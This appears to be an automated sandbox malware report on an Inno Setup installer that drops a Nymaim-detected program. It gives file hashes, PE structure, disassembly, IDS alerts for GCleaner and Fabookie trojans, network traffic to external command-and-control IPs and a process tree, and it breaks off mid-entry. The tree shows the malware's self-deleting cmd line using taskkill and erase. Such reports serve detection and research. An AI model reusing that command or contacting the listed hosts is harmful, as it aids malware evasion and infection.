                SHA-512:27EDF7A71C6546F1AB52E7EF97E404975DDD237D6C2D1038D24A49EAB724971884510F00F427C713ADB105857A0B12C7D57CA1CA1C70A6CEFED4BE619C345F4C
                Malicious:true
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2560
                Entropy (8bit):2.8818118453929262
                Encrypted:false
                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                MD5:A69559718AB506675E907FE49DEB71E9
                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.226829458093667
                Encrypted:false
                SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):23312
                Entropy (8bit):4.596242908851566
                Encrypted:false
                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):6.20389308045717
                Encrypted:false
                SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                MD5:3FB36CB0B7172E5298D2992D42984D06
                SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                Entropy (8bit):7.9253810174103325
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.88%
                • Inno Setup installer (109748/4) 1.08%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1970815
                MD5:4206f8b371294f11b01592acc7bb338d
                SHA1:9383a82b185715c4b42b23ef730acb53f17dfcfb
                SHA256:5f5252d8963550284ca23188a6ee8a5b9aa85c3d1ce1f5983ee7dcc7e60f8b33
                SHA512:4396f5199bf5fb4fd62b3b4b652801161f5cc19dec17b0cc7ce0700e314f478dd06750a9c3fb53eb1d688f0bf0d5132331f8b821cfb75255d1e49c80609fca7b
                SSDEEP:24576:lpniVajDB1ubGd/qd5o37sEPfU2kCchDvfDBPNtbVWiY/Q6PmFNggJoHOVgcF93o:3ikj9k2k7TpNgPmFJN3T6t7gZ8UkqBi
                TLSH:17951235B09071EEF8F35AB0040F456C6A672F7369A8BE2E251AB3395932371F516F24
                File Content Preview:MZP.....................@.......................InnoW...................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                Icon Hash:b8ba6cc880e1f204
                Entrypoint:0x409820
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:1
                OS Version Minor:0
                File Version Major:1
                File Version Minor:0
                Subsystem Version Major:1
                Subsystem Version Minor:0
                Import Hash:e92b45c54aa05ec107d5ef90662e6b33
                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFD4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-10h], eax
                mov dword ptr [ebp-1Ch], eax
                call 00007F90A86E9FDBh
                call 00007F90A86EB286h
                call 00007F90A86ED489h
                call 00007F90A86ED4D0h
                call 00007F90A86EFAC7h
                call 00007F90A86EFC2Eh
                mov esi, 0040BDE0h
                xor eax, eax
                push ebp
                push 00409F05h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 00409EBBh
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [0040B014h]
                call 00007F90A86F061Fh
                call 00007F90A86F01DEh
                lea edx, dword ptr [ebp-10h]
                xor eax, eax
                call 00007F90A86ED944h
                mov edx, dword ptr [ebp-10h]
                mov eax, 0040BDD4h
                call 00007F90A86EA087h
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [0040BDD4h]
                mov dl, 01h
                mov eax, 00407158h
                call 00007F90A86EE02Bh
                mov dword ptr [0040BDD8h], eax
                xor edx, edx
                push ebp
                push 00409E99h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                lea edx, dword ptr [ebp-18h]
                mov eax, dword ptr [0040BDD8h]
                call 00007F90A86EE127h
                mov ebx, dword ptr [ebp-18h]
                mov edx, 00000030h
                mov eax, dword ptr [0040BDD8h]
                call 00007F90A86EE261h
                mov edx, esi
                mov ecx, 0000000Ch
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc000 | 0x8f0 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x1f558 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf000 | 0x0 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0xe000 | 0x18 | .rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                CODE | 0x1000 | 0x8f94 | 0x9000 | False | 0.6195203993055556 | data | 6.591638965772245 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA | 0xa000 | 0x248 | 0x400 | False | 0.306640625 | data | 2.7093261929320986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS | 0xb000 | 0xe64 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0xc000 | 0x8f0 | 0xa00 | False | 0.3953125 | data | 4.294209855544776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls | 0xd000 | 0x8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata | 0xe000 | 0x18 | 0x200 | False | 0.052734375 | data | 0.1991075177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc | 0xf000 | 0x884 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc | 0x10000 | 0x1f558 | 0x1f600 | False | 0.37483659113545814 | data | 4.9335056025106585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country
                RT_ICON | 0x1039c | 0x51f3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                RT_ICON | 0x15590 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States
                RT_ICON | 0x25db8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States
                RT_ICON | 0x29fe0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States
                RT_ICON | 0x2c588 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States
                RT_ICON | 0x2d630 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States
                RT_ICON | 0x2dfb8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States
                RT_STRING | 0x2e420 | 0x2f2 | data | |
                RT_STRING | 0x2e714 | 0x30c | data | |
                RT_STRING | 0x2ea20 | 0x2ce | data | |
                RT_STRING | 0x2ecf0 | 0x68 | data | |
                RT_STRING | 0x2ed58 | 0xb4 | data | |
                RT_STRING | 0x2ee0c | 0xae | data | |
                RT_GROUP_ICON | 0x2eebc | 0x68 | data | English | United States
                RT_VERSION | 0x2ef24 | 0x3a8 | data | English | United States
                RT_MANIFEST | 0x2f2cc | 0x289 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
                DLL | Import
                kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                user32.dll | MessageBoxA
                oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                comctl32.dll | InitCommonControls
                advapi32.dll | AdjustTokenPrivileges
                Language of compilation system | Country where language is spoken | Map
                English | United States |
                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                01/05/23-09:17:07.792702 | TCP | 2041920 | ET TROJAN GCleaner Downloader Activity M8 | 49696 | 80 | 192.168.2.4 | 45.139.105.171
                01/05/23-09:17:07.993654 | TCP | 2852981 | ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                01/05/23-09:17:08.021859 | TCP | 2852925 | ETPRO TROJAN GCleaner Downloader - Payload Response | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                01/05/23-09:17:07.923264 | TCP | 2852980 | ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jan 5, 2023 09:17:07.767301083 CET | 49696 | 80 | 192.168.2.4 | 45.139.105.171
                Jan 5, 2023 09:17:07.791863918 CET | 80 | 49696 | 45.139.105.171 | 192.168.2.4
                Jan 5, 2023 09:17:07.792061090 CET | 49696 | 80 | 192.168.2.4 | 45.139.105.171
                Jan 5, 2023 09:17:07.792701960 CET | 49696 | 80 | 192.168.2.4 | 45.139.105.171
                Jan 5, 2023 09:17:07.816838980 CET | 80 | 49696 | 45.139.105.171 | 192.168.2.4
                Jan 5, 2023 09:17:07.824846983 CET | 80 | 49696 | 45.139.105.171 | 192.168.2.4
                Jan 5, 2023 09:17:07.825201988 CET | 49696 | 80 | 192.168.2.4 | 45.139.105.171
                Jan 5, 2023 09:17:07.895375013 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:07.922629118 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:07.922785044 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:07.923264027 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:07.950546980 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:07.950826883 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:07.950993061 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:07.993654013 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.021770954 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.021858931 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.021920919 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.021958113 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.021982908 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022022963 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022089005 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022104025 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022141933 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022177935 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022231102 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022253036 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022308111 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022329092 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022372007 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022401094 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022454977 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022476912 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022533894 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.022552013 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.022604942 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.049844980 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.049933910 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.049982071 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050013065 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050044060 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050091028 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050122976 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050167084 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050198078 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050245047 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050272942 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050329924 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050348997 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050398111 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050425053 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050476074 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050504923 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050556898 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050580025 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050632000 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050658941 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050760031 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050781012 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050812006 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050853014 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050905943 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.050928116 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.050978899 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.051002026 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.051053047 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.051074028 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.051125050 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.051150084 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.051206112 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.051224947 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.051280022 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.051300049 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.051362991 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.051378965 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.051413059 CET | 49697 | 80 | 192.168.2.4 | 107.182.129.235
                Jan 5, 2023 09:17:08.078811884 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.078901052 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.078959942 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.079025984 CET | 80 | 49697 | 107.182.129.235 | 192.168.2.4
                Jan 5, 2023 09:17:08.079044104 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079073906 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079087973 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079133034 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079194069 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079214096 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079255104 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079288006 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079345942 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079364061 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079415083 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079448938 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079504967 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079524040 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079579115 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079598904 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079653978 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079674959 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079725027 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079749107 CET8049697107.182.129.235192.168.2.4
                • 45.139.105.171
                • 107.182.129.235
                • 171.22.30.106


                Target ID: 0
                Start time: 09:16:58
                Start date: 05/01/2023
                Path: C:\Users\user\Desktop\file.exe
                Wow64 process (32bit): true
                Commandline: C:\Users\user\Desktop\file.exe
                Imagebase: 0x400000
                File size: 1970815 bytes
                MD5 hash: 4206F8B371294F11B01592ACC7BB338D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: low

                Target ID: 1
                Start time: 09:16:59
                Start date: 05/01/2023
                Path: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
                Imagebase: 0x400000
                File size: 778752 bytes
                MD5 hash: E8176050192FBB976D70238E3C121F4C
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: moderate

                Target ID: 2
                Start time: 09:17:02
                Start date: 05/01/2023
                Path: C:\Program Files (x86)\Split Files\SplitFiles131.exe
                Wow64 process (32bit): true
                Commandline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Imagebase: 0x400000
                File size: 3299023 bytes
                MD5 hash: D26C02425FA67FBDC0E4B4D5D6FA6088
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation: low

                Target ID: 3
                Start time: 09:17:06
                Start date: 05/01/2023
                Path: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
                Wow64 process (32bit): true
                Commandline:
                Imagebase: 0x1300000
                File size: 73728 bytes
                MD5 hash: 3FB36CB0B7172E5298D2992D42984D06
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Antivirus matches:
                • Detection: 50%, ReversingLabs
                Reputation: high

                Target ID: 4
                Start time: 09:17:36
                Start date: 05/01/2023
                Path: C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit): true
                Commandline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Imagebase: 0xd90000
                File size: 232960 bytes
                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                Target ID: 5
                Start time: 09:17:36
                Start date: 05/01/2023
                Path: C:\Windows\System32\conhost.exe
                Wow64 process (32bit): false
                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase: 0x7ff7c72c0000
                File size: 625664 bytes
                MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                Target ID: 6
                Start time: 09:17:36
                Start date: 05/01/2023
